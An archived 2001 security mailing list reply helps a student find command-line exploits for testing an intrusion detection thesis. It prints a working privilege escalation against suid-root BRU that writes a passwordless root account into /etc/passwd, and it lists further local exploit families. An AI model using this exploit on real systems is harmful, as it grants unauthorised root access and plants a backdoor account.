A good way to test a hacker's skills is to put him on a random box with only console access. ( no way to access outside exploits ) His tools: A compiler, find, ps, a debugger and his intuition. ( lsof and strace if he's real lucky. ) Give him/her 12 hours to succeed. (without getting up to browse a website for vulnerability information) How many so called "network security specialists" out there would succeed... not many, very few actually. Why? Most pentester's aren't good at all... just prepared. Their worst nightmare is being thrown into a secure network not prepared. It takes true talent to succeed in an unfamiliar, secure situation. ( this is a big reason why contests last as long as they do) Becoming familiar with command line based exploits will greatly help with these situations. Command line exploits: I found a vulnerability several months ago in BRU (Backup Restoration Utility). (suid root) By specifying the BRUEXECLOG environment variable, we could change the log file bru would write to. (as root) We have to be sneaky though, because we can't access any other command line options without being root. -V get's version info. We also have to export BRUEXECLOG so bru can see it. Exploit : $ export BRUEXECLOG=/etc/passwd $ bru -V ' >rooted::0:0::/:/bin/bash >' $ If you want command line only exploits look at : path exploits IFS exploits,IFS = Internal Field Seperator I believe. enviroment variable exploits symlink exploits Glibc bugs Search the "Vulnerabilities" section at securityfocus.com for : PATH= IFS "ln -s" LD_ Keep in mind, many command line based exploits are shell scripts. Also look ath the older HPUX/DGUX/IRIX exploits, there are many of these type of exploits there. http://www.securityfocus.com/vdb/?id=1929 http://www.securityfocus.com/vdb/?id=541 http://www.securityfocus.com/vdb/?id=454 Riley Hassell Vulnerability Developer eEye Digital Security ----- Original Message ----- From: "Marc Plaggemeier" <mpat_private> To: <VULN-DEVat_private> Sent: Wednesday, April 11, 2001 3:02 AM Subject: Looking for exploits > Hello, > > perphaps the list is the right place to ask some questions about > the "sort of exploits". > > I am actually writing on my diploma theses about intrusion detection. > My system has a anomaly and a misuse detection module. > Now, I am looking for some exploits to test my misuse detection module. > It controls only commands given by the users (nothing else). > > So I was looking for some exploits which only use the commandline. No > shellscript or something else. > But I did not found so much. Most of the exploits were C-Programs or > shell-scripts. (using some sort of buffer overflows) > > So my question is: > Are there any exploits which are "based" on the commandline? (like old > sendmail bugs) I know there are some exploits! But how I can find some > of them? I searched in some archives but ... > > How many exploits are based on C-Programs or shell-scripts? Are there any > statistics? > > Perhaps someone can help me! > > Thanks, > Greetings > Marc Plaggemeier >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 18:21:38 PDT